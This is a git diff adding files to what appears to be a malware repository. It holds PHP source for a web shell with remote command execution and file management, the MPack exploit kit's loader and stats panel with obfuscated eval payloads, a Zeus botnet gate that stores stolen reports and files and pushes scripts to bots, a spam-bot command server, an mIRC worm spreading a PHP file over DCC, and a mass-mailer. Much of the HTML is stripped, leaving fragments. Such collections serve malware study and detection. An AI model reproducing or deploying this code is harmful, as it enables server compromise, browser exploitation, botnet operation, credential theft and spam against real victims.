    " ; + + } + + else { + + $dpos = strrpos($oldfile, "/"); + + if (strval($dpos)!="") { + + $olddir = substr($oldfile, 0, $dpos+1); + + } + + else { + + $olddir = "$lastdir/"; + + } + + $fpos = strrpos($oldfile, "/"); + + if (strval($fpos)!="") { + + $inputfile = substr($oldfile, $fpos+1); + + } + + else { + + $inputfile = ""; + + } + + echo "
    \n"; + + echo "\n"; + + echo "\n"; + + echo "\n"; + + echo "\n"; + + echo "\n"; + + echo "Rename \"$oldfile\" to:
    \n"; + + echo "
    "; + + echo "
    "; + + echo "
    "; + + } + +} + +else if ( $cmd == "con") { + + + +?> + +
    + + + +
    + +

    PHPKonsole

    + + + + + + + +
    " method="post"> + + + +
    Current working directory: + + + + Root/', $PHP_SELF, $stderr); + + if (!empty($work_dir_splitted[0])) { + + $path = ''; + + for ($i = 0; $i < count($work_dir_splitted); $i++) { + + $path .= '/' . $work_dir_splitted[$i]; + + printf('%s/', $PHP_SELF, $stderr, urlencode($path), $work_dir_splitted[$i]); + + } + + } + + ?>Choose new working directory:
    + +

    Command: + +

    + +

    Enable stderr-trapping? >

    + + + +
    + + + + + +
    + + */ + + $isMainMenu = true; + + ?> + + + + + + + + + +
    + +
     .:: Main Menu ::. 
    + +
    + +
    + +
    + + + + + + + + + + + + + + + + + + + +
    + + ==> Haxplorer <==", "cmd=dir&dir=.").sp(2); ?> + + + + Haxplorer is a server side file browser wich (ab)uses the directory object to list + + the files and directories stored on a webserver. This handy tools allows you to manage + + files and directories on a unsecure server with php support.

    This entire script + + is coded for unsecure servers, if your server is secured the script will hide commands + + or will even return errors to your browser...

    + +
    + + ==> PHPKonsole <==", "cmd=con").sp(2); ?> + + + +
    PHPKonsole is just a little telnet like shell wich allows you to run commands on the webserver. + + When you run commands they will run as the webservers UserID. This should work perfectly + + for managing files, like moving, copying etc. If you're using a linux server, system commands + + such as ls, mv and cp will be available for you...

    This function will only work if the + + server supports php and the execute commands...

    + +
    + +
    + +
    + + + + + + + + + + + +
    + +
    + +   [ Main Menu ] ", "cmd=&dir="); ?>   + +   [ PHPKonsole ] ", "cmd=con"); ?>   + +   [ Haxplorer ] ", "cmd=dir&dir=."); ?>    + +
    + +
    + +
    + + + + + + + + + + + +
    + +
      - -  
    + +
    + +
    + + + + + + + + + + + diff --git a/PHP/HackTool.PHP.Iframer.a b/PHP/HackTool.PHP.Iframer.a new file mode 100644 index 00000000..acf4d4f5 --- /dev/null +++ b/PHP/HackTool.PHP.Iframer.a @@ -0,0 +1,52 @@ +$c $r"; + } +?> \ No newline at end of file diff --git a/PHP/HackTool.PHP.Mphak.b b/PHP/HackTool.PHP.Mphak.b new file mode 100644 index 00000000..e4c124a8 --- /dev/null +++ b/PHP/HackTool.PHP.Mphak.b @@ -0,0 +1,229 @@ + + + + + +MPack + + + + +

    + + + + + +
    +

    Server time/date snapshot: 
    +

    +
    +

    MPack v0.90 stats

    +
    +
    + + + + + +
    + + + + + + + + + + + +
    +Attacked hosts (total - uniq)

    IE XP ALL

    QuickTime

    Win2000

    Firefox

    Opera7

    +
    + + + + + + + + + + + + + + +
    +Traffic (total - uniq)

    Total traff

    Exploited

    Loads count

    Loader's response

    +

    Efficiency

    +
    +
    +
    + + + + + +
    + + + + + + + + + + + +
    +Browser stats (total)

    ".@round(($count/$tt)*100, 1)."%"; ?>
    +
    + + + + + +ON";} else {$UB="OFF";}; +if ($OnlyDefiniedCoutries==1) {$CB="all except
    ".$CoutryList."";} else { $CB="OFF"; } +?> + +
    + + + + +
    +Modules state

    Statistic type

    User blocking

    Country blocking

    +
    + + + +
    + + + + +
    + + + + + + + + +';} + +$query = "SELECT * FROM ".$dbstats." WHERE statid = 'traff' ORDER BY count DESC"; +$r = mysql_query($query); + while ($array = @mysql_fetch_array($r)) + { ?> + + + + 0) { $loads = $array2['count']; } else { $loads = 0; } +?> + + + + + +
    +CountryTraffLoads +

    Efficiency

    +
    +

     

    +
    ".@round(($array['count']/$tt)*100, 1)."%"; ?>".@round(($loads/$et)*100, 1)."%"; ?>
    +
    +
    + + + + +
    + + + + + + +$MinRefs) { ?> + + + +
    +

    Referer stats (>)

    +

    ".@round(($count/$tt)*100, 1)."%"; ?>
    +
    + + + +
    +(c) 2007 DreamCoders
    +MPack software is created solely for test purposes. You are prohibited to use it in conditions violating local or international laws. Authors hold no responsibility for any damage, direct or indirect, caused by usage of this software 
    + + + + + diff --git a/PHP/HackTool.PHP.Mphak.c b/PHP/HackTool.PHP.Mphak.c new file mode 100644 index 00000000..010b89b3 --- /dev/null +++ b/PHP/HackTool.PHP.Mphak.c @@ -0,0 +1,65 @@ +str = "'.$new.'";str2 = "";for (i = 0; i < str.length; i ++) { str2 = str2 + String.fromCharCode (str.charCodeAt (i) ^ 1); }; eval (str2);'; +} +if ($java == true) echo ''; +elseif ($browser == "MSIE") echo ''.encode ('').""; +elseif ($browser == "Opera") echo encode (''); +?> \ No newline at end of file diff --git a/PHP/HackTool.PHP.Mphak.e b/PHP/HackTool.PHP.Mphak.e new file mode 100644 index 00000000..810c59ca --- /dev/null +++ b/PHP/HackTool.PHP.Mphak.e @@ -0,0 +1,236 @@ +0) { + //found data, prevent view + echo ":["; + exit; + } else { + //not found, add + $query = "INSERT INTO ".$dbstats."_users VALUES ('".$ipua."')"; + mysql_query($query); + } + } + +} + +} + + + +// Windows NT 5.0 = Win2000 +// Windows NT 5.1 = WinXP sp0,1 +// Windows NT 5.1 SP2 = WinXP sp2 (Windows NT 5.1; SV1) under IE +// Windows NT 5.2 = Win2003 build 164/16.6 +$browser = detect_browser(getenv("HTTP_USER_AGENT")); + + +if ($OnlyDefiniedCoutries==1) { CheckCountry(); } + + +if ($BlockDuplicates==1) { CheckAddUser(); } + +AddIP("all"); +if ($UseMySQL==1) { //geo2ip stat on traff +$id="traff"; +$cci=GetCountryInfo(getenv("REMOTE_ADDR")); +//increase hits to this country + $query = "UPDATE ".$dbstats." SET count = count + 1 WHERE a2 = '".$cci['a2']."' AND statid = '".$id."'"; + $r = mysql_query($query); + if (mysql_affected_rows() == 0) + { + $query = "INSERT INTO ".$dbstats." VALUES ('".$id."', '".$cci['a2']."', '".$cci['name']."', 1)"; + mysql_query($query); + } + +//browser-type count + $query = "UPDATE ".$dbstats."_brs SET count = count + 1 WHERE browser = '".$browser[name]."'"; + $r = mysql_query($query); + if (mysql_affected_rows() == 0) + { + $query = "INSERT INTO ".$dbstats."_brs VALUES ('".$browser[name]."', 1)"; + mysql_query($query); + } + + +} + + +if ($CountReferers==1) { //referer count +$ref="_".substr(@mysql_real_escape_string(getenv("HTTP_REFERER")),0,100); + $query = "UPDATE ".$dbstats."_refs SET count = count + 1 WHERE referer = '".$ref."'"; + $r = mysql_query($query); + if (mysql_affected_rows() == 0) + { + $query = "INSERT INTO ".$dbstats."_refs VALUES ('".$ref."', 1)"; + mysql_query($query); + } + + + +} + + + +//extended loader's subsystem +if (isset($_GET['id'])) { +$LoaderPath=$LoaderPath."?id=".$_GET['id']; +} + + +//exploits combination +if ($browser[name]=="MSIE") { + if ($browser[os]!="Windows NT 5.0") { AddIP("0day"); include 'crypt.php'; include 'megapack1.php'; } + if ($browser[os]=="Windows NT 5.0") { AddIP("jar"); include 'ms06-044_w2k.php'; include 'megapack1.php'; } +} + +if ($browser[name]=="Firefox") { AddIP("firefox"); include 'ff.php'; } + +if ($browser[name]=="Opera") { + if (substr($browser[version], 0, 1)<"8") { AddIP("opera7"); include 'o7.php'; } +} + + + +//if ($browser[name]!="Opera") && ($browser[name]!="Firefox") && ($browser[name]!="MSIE") { include 'megapack1.php'; } + +//echo getenv("HTTP_USER_AGENT")."
    "; +//echo "Browser: ".$browser[name]."
    Browser Ver: ".$browser[version]."
    OS: ".$browser[os]; + + +?> \ No newline at end of file diff --git a/PHP/HackTool.PHP.Small.f b/PHP/HackTool.PHP.Small.f new file mode 100644 index 00000000..5d834fe7 --- /dev/null +++ b/PHP/HackTool.PHP.Small.f @@ -0,0 +1 @@ + diff --git a/PHP/HackTool.PHP.Zbot.a b/PHP/HackTool.PHP.Zbot.a new file mode 100644 index 00000000..ee00ee51 --- /dev/null +++ b/PHP/HackTool.PHP.Zbot.a @@ -0,0 +1,293 @@ + Ñервер предÑтавлÑет из ÑÐµÐ±Ñ Ñо Ñтороны бота - отÑылка отчета о чем либо, + а Ñо Ñтороны Ñервера - отправка изменений в наÑтройках( или команды). Со Ñтороны бота, за раз + отправлÑетÑÑ Ð¸Ð½Ñ„Ð¾Ñ€Ð¼Ð°Ñ†Ð¸Ñ Ð¾Ð± одном Ñобытие/объекте. +*/ + +if(@$_SERVER['REQUEST_METHOD'] !== 'POST')die(); +require_once('system/global.php'); +require_once('system/config.php'); + +//Получаем данные. +$data = @file_get_contents('php://input'); +$data_size = @strlen($data); +if($data_size < HEADER_SIZE + ITEM_HEADER_SIZE)die(); +$data = RC4($data, BOTNET_CRYPTKEY); + +//ВерефикациÑ. ЕÑли Ñовпадает MD5, нет ÑмыÑла проверÑÑ‚ÑŒ, что-то еще. +if(strcmp(md5(substr($data, HEADER_SIZE), true), substr($data, HEADER_MD5, 16)) !== 0)die(); + +//ПарÑим данные (Сжатие данных не поддерживаетÑÑ). +//ПоздравлÑÑŽ мега хакеров, Ñтот алгоритм позволит вам Ñпокойно читать данные бота. Ðе забудьте напиÑать 18 парÑеров и 100 бÑкдоров. +$list = array(); +for($i = HEADER_SIZE; $i < $data_size;) +{ + $k = @unpack('L4', @substr($data, $i, ITEM_HEADER_SIZE)); + $list[$k[1]] = @substr($data, $i + ITEM_HEADER_SIZE, $k[3]); + $i += (ITEM_HEADER_SIZE + $k[3]); +} +unset($data); + +//ОÑновные параметры, которые должны быть вÑегда. +if(empty($list[SBCID_BOT_VERSION]) || empty($list[SBCID_BOT_ID]))die(); + +//ПодключаемÑÑ Ðº базе. +if(!ConnectToDB())die(); + +//////////////////////////////////////////////////////////////////////////////////////////////////// +// Обрабатываем данные. +//////////////////////////////////////////////////////////////////////////////////////////////////// + +$bot_id = str_replace("\x01", "\x02", trim($list[SBCID_BOT_ID])); +$bot_id_q = addslashes($bot_id); +$botnet = (empty($list[SBCID_BOTNET])) ? DEFAULT_BOTNET : str_replace("\x01", "\x02", trim($list[SBCID_BOTNET])); +$botnet_q = addslashes($botnet); +$bot_version = ToUint($list[SBCID_BOT_VERSION]); +$real_ipv4 = trim((!empty($_GET['ip']) ? $_GET['ip'] : $_SERVER['REMOTE_ADDR'])); +$country = GetCountryIPv4(); //str_replace("\x01", "\x02", GetCountryIPv4()); +$country_q = addslashes($country); +$curtime = time(); +$rtime_min_online = $curtime - BOTNET_TIMEOUT; //Минимальное времÑ, при котором бот ÑчитаетÑÑ Ð² онлайне. + +//Отчет об иÑполнении Ñкрипта. +if(!empty($list[SBCID_SCRIPT_ID]) && isset($list[SBCID_SCRIPT_STATUS], $list[SBCID_SCRIPT_RESULT]) && strlen($list[SBCID_SCRIPT_ID]) == 16) +{ + if(!@mysql_query("INSERT INTO botnet_scripts_stat SET bot_id='{$bot_id_q}',bot_version={$bot_version},rtime={$curtime},". + "extern_id='".addslashes($list[SBCID_SCRIPT_ID])."',". + "type=".(ToInt($list[SBCID_SCRIPT_STATUS]) == 0 ? 2 : 3).",". + "report='".addslashes($list[SBCID_SCRIPT_RESULT])."'"))die(); +} +//ЗапиÑÑŒ логов/файлов. +else if(!empty($list[SBCID_BOTLOG]) && !empty($list[SBCID_BOTLOG_TYPE])) +{ + $type = ToInt($list[SBCID_BOTLOG_TYPE]); + + if($type == BLT_FILE) + { + //РаÑÑˆÐ¸Ñ€ÐµÐ½Ð¸Ñ ÐºÐ¾Ñ‚Ð¾Ñ€Ñ‹Ðµ, предÑтавлÑÑŽÑ‚ возможноÑÑ‚ÑŒ удаленного запуÑка. + $bad_exts = array('.php', '.asp', '.exe', '.pl', '.cgi', '.cmd', '.bat'); + $fd_hash = 0; + $fd_size = strlen($list[SBCID_BOTLOG]); + + //Формируем Ð¸Ð¼Ñ Ñ„Ð°Ð¹Ð»Ð°. + $file_path = REPORTS_PATH.'/files/'.urlencode($botnet).'/'.urlencode($bot_id); + $last_name = ''; + $l = explode('/', (isset($list[SBCID_PATH_DEST]) && strlen($list[SBCID_PATH_DEST]) > 0 ? str_replace('\\', '/', $list[SBCID_PATH_DEST]) : 'unknown')); + foreach($l as $k)if(strlen($k) > 0 && strcmp($k, '..') !== 0 && strcmp($k, '.') !== 0)$file_path .= '/'.($last_name = urlencode($k)); + if(strlen($last_name) === 0)$file_path .= '/unknown.dat'; + unset($l); + + //ПроверÑем раÑширении, и указываем маÑку файла. + if(($ext = strrchr($last_name, '.')) === false || array_search(strtolower($ext), $bad_exts) !== false)$file_path .= '.dat'; + $ext_pos = strrpos($file_path, '.'); + + //ДобавлÑем файл. + for($i = 0; $i < 9999; $i++) + { + if($i == 0)$f = $file_path; + else $f = substr_replace($file_path, '('.$i.').', $ext_pos, 1); + + if(file_exists($f)) + { + if($fd_size == filesize($f)) + { + if($fd_hash === 0)$fd_hash = md5($list[SBCID_BOTLOG], true); + if(strcmp(md5_file($f, true), $fd_hash) === 0)break; + } + } + else + { + if(!CreateDir(dirname($file_path)) || !($h = fopen($f, 'wb')))die(); + + flock($h, LOCK_EX); + fwrite($h, $list[SBCID_BOTLOG]); + flock($h, LOCK_UN); + fclose($h); + + break; + } + } + } + else + { + //ЗапиÑÑŒ в базу. + if(REPORTS_TO_DB === 1) + { + $table = 'botnet_reports_'.gmdate('ymd', $curtime); + $query = "INSERT DELAYED INTO {$table} SET bot_id='{$bot_id_q}',botnet='{$botnet_q}',bot_version={$bot_version},type={$type},country='{$country_q}',rtime={$curtime},". + "path_source='". (empty($list[SBCID_PATH_SOURCE]) ? '' : addslashes($list[SBCID_PATH_SOURCE]))."',". + "path_dest='". (empty($list[SBCID_PATH_DEST]) ? '' : addslashes($list[SBCID_PATH_DEST]))."',". + "time_system=". (empty($list[SBCID_TIME_SYSTEM]) ? 0 : ToUint($list[SBCID_TIME_SYSTEM])).",". + "time_tick=". (empty($list[SBCID_TIME_TICK]) ? 0 : ToUint($list[SBCID_TIME_TICK])).",". + "time_localbias=".(empty($list[SBCID_TIME_LOCALBIAS]) ? 0 : ToInt($list[SBCID_TIME_LOCALBIAS])).",". + "os_version='". (empty($list[SBCID_OS_INFO]) ? '' : addslashes($list[SBCID_OS_INFO]))."',". + "language_id=". (empty($list[SBCID_LANGUAGE_ID]) ? 0 : ToUshort($list[SBCID_LANGUAGE_ID])).",". + "process_name='". (empty($list[SBCID_PROCESS_NAME]) ? '' : addslashes($list[SBCID_PROCESS_NAME]))."',". + "ipv4='". addslashes($real_ipv4)."',". + "context='". addslashes($list[SBCID_BOTLOG])."'"; + + //Думаю такой порÑдок повышает производительноÑÑ‚ÑŒ. + if(!@mysql_query($query) && (!@mysql_query("CREATE TABLE IF NOT EXISTS {$table} LIKE botnet_reports") || !@mysql_query($query)))die(); + } + + //ЗапиÑÑŒ в файл. + if(REPORTS_TO_FS === 1) + { + $file_path = REPORTS_PATH.'/other/'.urlencode($botnet).'/'.urlencode($bot_id); + if(!CreateDir($file_path) || !($h = fopen($file_path.'/reports.txt', 'ab')))die(); + + flock($h, LOCK_EX); + fwrite($h, str_repeat("=", 80)."\r\n". + "bot_id={$bot_id}\r\n". + "botnet={$botnet}\r\n". + "bot_version=".IntToVersion($bot_version)."\r\n". + "ipv4={$real_ipv4}\r\n". + "country={$country}\r\n". + "type={$type}\r\n". + "rtime=". gmdate('H:i:s d.m.Y', $curtime)."\r\n". + "time_system=". (empty($list[SBCID_TIME_SYSTEM]) ? 0 : gmdate('H:i:s d.m.Y', ToInt($list[SBCID_TIME_SYSTEM])))."\r\n".//time() тоже возращает int. + "time_tick=". (empty($list[SBCID_TIME_TICK]) ? 0 : TickCountToTime(ToUint($list[SBCID_TIME_TICK]) / 1000))."\r\n". + "time_localbias=".(empty($list[SBCID_TIME_LOCALBIAS]) ? 0 : TimeBiasToText(ToInt($list[SBCID_TIME_LOCALBIAS])))."\r\n". + "os_version=". (empty($list[SBCID_OS_INFO]) ? '' : OSDataToString($list[SBCID_OS_INFO]))."\r\n". + "language_id=". (empty($list[SBCID_LANGUAGE_ID]) ? 0 : ToUshort($list[SBCID_LANGUAGE_ID]))."\r\n". + "process_name=". (empty($list[SBCID_PROCESS_NAME]) ? '' : $list[SBCID_PROCESS_NAME])."\r\n". + "path_source=". (empty($list[SBCID_PATH_SOURCE]) ? '' : $list[SBCID_PATH_SOURCE])."\r\n". + "context=\r\n". $list[SBCID_BOTLOG]."\r\n\r\n\r\n"); + flock($h, LOCK_UN); + fclose($h); + } + } +} +//Отчет об онлайн-ÑтатуÑе. +else if(!empty($list[SBCID_BOT_STATUS])) +{ + //Стандартный запроÑ. + $query = "bot_id='{$bot_id_q}',botnet='{$botnet_q}',bot_version={$bot_version},country='{$country_q}',rtime_last={$curtime},". + + "net_latency=". (empty($list[SBCID_NET_LATENCY]) ? 0 : ToUint($list[SBCID_NET_LATENCY])).",". + "port_s1=". (empty($list[SBCID_PORT_S1]) ? 0 : ToUshort($list[SBCID_PORT_S1])).",". + "time_localbias=".(empty($list[SBCID_TIME_LOCALBIAS]) ? 0 : ToInt($list[SBCID_TIME_LOCALBIAS])).",". + "os_version='". (empty($list[SBCID_OS_INFO]) ? '' : addslashes($list[SBCID_OS_INFO]))."',". + "language_id=". (empty($list[SBCID_LANGUAGE_ID]) ? 0 : ToUshort($list[SBCID_LANGUAGE_ID])).",". + "ipv4='". addslashes($real_ipv4)."',". + "flag_nat=IF(net_latency > 0, IF(port_s1 > 0, 0, 1), 1)";//FIXME: ОпределÑÑ‚ÑŒ NAT ботом. + + if(!mysql_query("INSERT INTO botnet_list SET comments='', rtime_first={$curtime}, rtime_online={$curtime}, flag_install=".(ToInt($list[SBCID_BOT_STATUS]) == BS_INSTALLED ? 1 : 0).", {$query} ". + "ON DUPLICATE KEY UPDATE rtime_online=IF(rtime_last <= {$rtime_min_online}, {$curtime}, rtime_online), {$query}"))die(); + + //ПоиÑк Ñкриптов Ð´Ð»Ñ Ð¾Ñ‚Ð¿Ñ€Ð°Ð²ÐºÐ¸. + $reply_data = ''; + $reply_count = 0; + + $bot_id_qm = ToSQLSafeMask($bot_id_q); + $botnet_qm = ToSQLSafeMask($botnet_q); + $country_qm = ToSQLSafeMask($country_q); + + $r = @mysql_query("SELECT extern_id, script_bin, send_limit, id FROM botnet_scripts WHERE flag_enabled=1 AND ". + "(countries_wl='' OR countries_wl LIKE BINARY '%\x01{$country_qm}\x01%') AND ". + "(countries_bl NOT LIKE BINARY '%\x01{$country_qm}\x01%') AND ". + "(botnets_wl='' OR botnets_wl LIKE BINARY '%\x01{$botnet_qm}\x01%') AND ". + "(botnets_bl NOT LIKE BINARY '%\x01{$botnet_qm}\x01%') AND ". + "(bots_wl='' OR bots_wl LIKE BINARY '%\x01{$bot_id_qm}\x01%') AND ". + "(bots_bl NOT LIKE BINARY '%\x01{$bot_id_qm}\x01%') ". + "LIMIT 10"); + + if($r)while((($m = mysql_fetch_row($r)))) + { + $eid = addslashes($m[0]); + + //ПроверÑем, не доÑтигнут ли лимит. + if($m[2] != 0 && ($j = @mysql_query("SELECT COUNT(*) FROM botnet_scripts_stat WHERE type=1 AND extern_id='{$eid}'")) && ($c = mysql_fetch_row($j)) && $c[0] >= $m[2]) + { + @mysql_query("UPDATE botnet_scripts SET flag_enabled=0 WHERE id={$m[3]} LIMIT 1"); + continue; + } + + //ДобовлÑем бота в ÑпиÑок отправленных. + if(@mysql_query("INSERT HIGH_PRIORITY INTO botnet_scripts_stat SET extern_id='{$eid}', type=1, bot_id='{$bot_id_q}', bot_version={$bot_version}, rtime={$curtime}, report='Sended'")) + { + $size = strlen($m[1]) + strlen($m[0]); + $reply_data .= pack('LLLL', ++$reply_count, 0, $size, $size).$m[0].$m[1]; + } + } + + if($reply_count > 0) + { + $reply_data = pack('LLL', HEADER_SIZE + strlen($reply_data), 0, $reply_count).md5($reply_data, true).$reply_data; + echo RC4($reply_data, BOTNET_CRYPTKEY); + die(); + } +} +else die(); + +//ОтправлÑем пуÑтой ответ. +SendEmptyReply(); + +/////////////////////////////////////////////////////////////////////////////// +// Функции. +/////////////////////////////////////////////////////////////////////////////// + +/* + Отправка пуÑтого ответа и выход. +*/ +function SendEmptyReply() +{ + echo RC4(pack('LLL', HEADER_SIZE + ITEM_HEADER_SIZE, 0, 1)."\x4A\xE7\x13\x36\xE4\x4B\xF9\xBF\x79\xD2\x75\x2E\x23\x48\x18\xA5"."\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", BOTNET_CRYPTKEY); + die(); +} + +/* + Получение Ñтраны. + + Return - string, Ñтрана. +*/ +function GetCountryIPv4() +{ + global $real_ipv4; + $ip = sprintf('%u', ip2long($real_ipv4)); + if(($r = @mysql_query("SELECT c FROM ipv4toc WHERE l<='".$ip."' AND h>='".$ip."' LIMIT 1")) && ($m = mysql_fetch_row($r)) !== false)return $m[0]; + else return '--'; +} + +/* + ÐšÐ¾Ð²ÐµÑ€Ñ‚Ð°Ñ†Ð¸Ñ Bin2UINT. + + IN $str - string, иÑÑ…Ð¾Ð´Ð½Ð°Ñ Ð±Ð¸Ð½Ð°Ñ€Ð½Ð°Ñ Ñтрока. + + Return - int, Ñконвертированное чиÑло. +*/ +function ToUint($str) +{ + $q = @unpack('L', $str); + return is_array($q) && is_numeric($q[1]) ? ($q[1] < 0 ? sprintf('%u', $q[1]) : $q[1]) : 0; +} + +/* + ÐšÐ¾Ð²ÐµÑ€Ñ‚Ð°Ñ†Ð¸Ñ Bin2INT. + + IN $str - string, иÑÑ…Ð¾Ð´Ð½Ð°Ñ Ð±Ð¸Ð½Ð°Ñ€Ð½Ð°Ñ Ñтрока. + + Return - int, Ñконвертированное чиÑло. +*/ +function ToInt($str) +{ + $q = @unpack('l', $str); + return is_array($q) && is_numeric($q[1]) ? $q[1] : 0; +} + +/* + ÐšÐ¾Ð²ÐµÑ€Ñ‚Ð°Ñ†Ð¸Ñ Bin2SHORT. + + IN $str - string, иÑÑ…Ð¾Ð´Ð½Ð°Ñ Ð±Ð¸Ð½Ð°Ñ€Ð½Ð°Ñ Ñтрока. + + Return - int, Ñконвертированное чиÑло. +*/ +function ToUshort($str) +{ + $q = @unpack('S', $str); + return is_array($q) && is_numeric($q[1]) ? $q[1] : 0; +} +?> \ No newline at end of file diff --git a/PHP/HackTool.PHP.Zunka.a b/PHP/HackTool.PHP.Zunka.a new file mode 100644 index 00000000..b725ecfa --- /dev/null +++ b/PHP/HackTool.PHP.Zunka.a @@ -0,0 +1,279 @@ +nCntSmtp,aThis->nCntYahoo,aThis->nCntIcq,aThis->nCntAim,aThis->nCntGtalk); + +if(isset($_GET['i'])) +inc_zu_counters($lg,$_GET['i'],@$_GET['s'],@$_GET['y'],@$_GET['g'],@$_GET['a'],@$_GET['sbt']); + + + +echo parse_zu_message(get_zu_mesage($lg)); + + + + +//Functions+++++++++++++++++++++++++++++++++++++++ + + +function crc32_from_tmpl($tname){ + global $mres; + + $q = "SELECT * FROM `tmpl_zu` WHERE `Tname`='".$tname."'"; + + $re = @mysql_query($q,$mres); + if(!mysql_num_rows($re)) + return 0; + + $crc = 0; + while ((@$row = mysql_fetch_object($re))){ + $crc += crc32($row->Tmessage); + }; + + return $crc; +}; + + + + + + + +function parse_zu_message($str){ + + $rs =''; + + + if($str=='sToPsPaM') + return "\r\n"."#U9:"."\r\n"."#U6:"."\r\n"."#U7:"."\r\n"; + + + //if there are templates + if(substr($str,0,2)=="#%"){ + //get ingo about templates and crc + $tmpl = get_templates($str); + + // echo crc32_from_tmpl($tmpl['sb']); + //echo $tmpl['sb']; + + $tmplcrc32 = crc32_from_tmpl($tmpl['im']).crc32_from_tmpl($tmpl['mail']).crc32_from_tmpl($tmpl['sb']); + + // echo '
    '.$tmplcrc32.'-s
    '.get_bot_inf(0,'FExecutedCrc');//.'-b inf'.$tmpl['im'].' s '.$tmpl['mail']; + + //compare crc on bot table - is there executed with template + if(compare_crc_executed($tmplcrc32)) + return "\r\n".'.crc tmpl.'; + + + $IM = get_template_content($tmpl['im'],'im'); + $MAILP = get_template_content($tmpl['mail'],'mp'); + $MAILS = get_template_content($tmpl['mail'],'ms'); + + $BOTSP = get_template_content($tmpl['sb'],'sbp'); + $BOTSS = get_template_content($tmpl['sb'],'sbs'); + + $rs = "\r\n"; + if(strlen($IM)){ + $rs .= "#U0:"."\r\n"; + $rs .= "#U9:".$IM."\r\n"; + }; + + if(strlen($BOTSP)) + $rs .= "#U::".$BOTSP."\r\n"; + + if(strlen($BOTSS)) + $rs .= "#U;:".$BOTSS."\r\n"; + + + if(strlen($MAILP)) + $rs .= "#U6:".$MAILP."\r\n"; + + if(strlen($MAILS)) + $rs .= "#U7:".$MAILS."\r\n"; + + + //write crc of returned message`s on bot + wri_bot_inf(0,'FExecutedCrc',$tmplcrc32); + + //return content + return $rs; + + }; + + + if(compare_crc_executed(crc32($str))) + return "\r\n".'.crc s.'; + + + + $rs .= "\r\n"."#U9:".str_replace("\r\n",'|',$str)."\r\n"; + $rs .= "\r\n"."#U6:".str_replace("\r\n",'|',$str)."\r\n"; + //for spam bots + $rs .= "\r\n"."#U::".str_replace("\r\n",'|',$str)."\r\n"; + + //write crc of returned message`s on bot + wri_bot_inf(0,'FExecutedCrc',crc32($str)); + + //return content + return $rs; +}; + + + + + + + + + + + +function get_template_content($name,$type){ + global $mres; + + $q = "SELECT * FROM `tmpl_zu` WHERE `Tname`='".$name."' AND `Ttype`='".$type."'"; + $res = mysql_query($q,$mres); + if(!mysql_num_rows($res)) + return ''; + + $strret =''; + while((@$row = mysql_fetch_object($res))){ + + $strret .= str_replace("\r\n",'|',$row->Tmessage).'%%'; + + }; + + return $strret; + +}; + + + + + +function get_templates($str){ + + $tparr = explode('#%',$str); + + foreach ($tparr as $a){ + + if(substr($a,0,2)=='im') + $ret['im']=urldecode(substr($a,3)); + if(substr($a,0,2)=='ml') + $ret['mail']=urldecode(substr($a,3)); + if(substr($a,0,2)=='sb') + $ret['sb']=urldecode(substr($a,3)); + if(substr($a,0,2)=='cr') + $ret['crc32']=urldecode(substr($a,3)); + + }; + return $ret; + +}; + + + + + +function prepare_zu_message($str){ + + $str = trim(trim($str)); + if(strlen($str)==0) + return ''; + + $str = str_replace("\r\n",'|',$str); + return "\r\n".'#U3:'.$str."\r\n"; + +}; + + + + + + + +function get_zu_mesage($land){ + global $mres; + + $q = "SELECT * FROM `task_zu` WHERE `Tland`='".$land."' LIMIT 1"; + $res = @mysql_query($q,$mres); + if(!mysql_num_rows($res)){ + + // if message for dafault land is set/ + $def = get_zu_def_message(); + + if(strlen($def)) + return trim($def); + + return ''; + } + + $row = mysql_fetch_object($res); + + if($row->Tstop) + return 'sToPsPaM'; + + + return trim($row->Tmessage); +}; + + + + + + +function get_zu_def_message(){ + global $mres; + $q = "SELECT * FROM `task_zu` WHERE `Tland`='DEF' LIMIT 1"; + $r = @mysql_query($q,$mres); + if(!@mysql_num_rows($r)) + return ''; + + $rw =mysql_fetch_object($r); + return $rw->Tmessage; + +}; + + + + + + +//check whem is the land in task table, if not - switch to DEF. +function present_in_task_zu($land){ + global $mres; + + $q = 'SELECT `Tland` FROM `task_zu` WHERE `Tland`="'.$land.'" LIMIT 1'; + + if(@mysql_num_rows(mysql_query($q,$mres))) + return $land; + else + return 'DEF'; +}; + + + + + + + + +function inc_zu_counters($land,$icq=0,$mail=0,$yahoo=0,$google=0,$aim=0,$spambots=0){ + global $mres; + + + //check land -- is in task list or not. + $land = present_in_task_zu($land); + + $q = "UPDATE `task_zu` SET `Tsbots_done`=`Tsbots_done`+".$spambots.", `Tgoogle_done`=`Tgoogle_done`+".$google.", `Taim_done`=`Taim_done`+".$aim.", `Ticq_done`=`Ticq_done`+".$icq.", `Tyahoo_done`=`Tyahoo_done`+".$yahoo.", `Tmail_done`=`Tmail_done`+".$mail." WHERE `Tland`='".$land."' LIMIT 1"; + + @mysql_query($q,$mres); + return mysql_affected_rows($mres); + +}; + + + + +?> \ No newline at end of file diff --git a/PHP/IRC-Worm.PHP.Caracula b/PHP/IRC-Worm.PHP.Caracula new file mode 100644 index 00000000..68b4e3f2 --- /dev/null +++ b/PHP/IRC-Worm.PHP.Caracula @@ -0,0 +1,8 @@ +[Script] +n0=; PHP.Caracula +n1=; By Xmorfic +n2=; Do not edit! +n3=ON 1:JOIN:#:{ +n4= /if ( $nick == $me) {halt} +n5= /.dcc send $nick c:\_msphp\ms.php +n6=} diff --git a/PHP/ProtonPHPWebPanel.7z b/PHP/ProtonPHPWebPanel.7z new file mode 100644 index 00000000..00fdca06 Binary files /dev/null and b/PHP/ProtonPHPWebPanel.7z differ diff --git a/PHP/SpamTool.PHP.Massma.v b/PHP/SpamTool.PHP.Massma.v new file mode 100644 index 00000000..e1ee1a53 --- /dev/null +++ b/PHP/SpamTool.PHP.Massma.v @@ -0,0 +1,266 @@ + + + + + + +BoLaJi eMailer + + + + + + + +PHP eMailer
    +made by JAMO BIZZ
    + +
    + +
    + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + +
    Your + + Email:
    + +
    + + + + + +
    Your + + Name:
    + +
    + + + +
    + +
    Reply-To:
    + +
    + + + + + +
    Attach + + File:
    + +
    + + + +
    + +
    Subject:
    + +
    + + + +
    + + + +
    + + + + Plain + + + + HTML + + + + + +
    + + + +
    + +
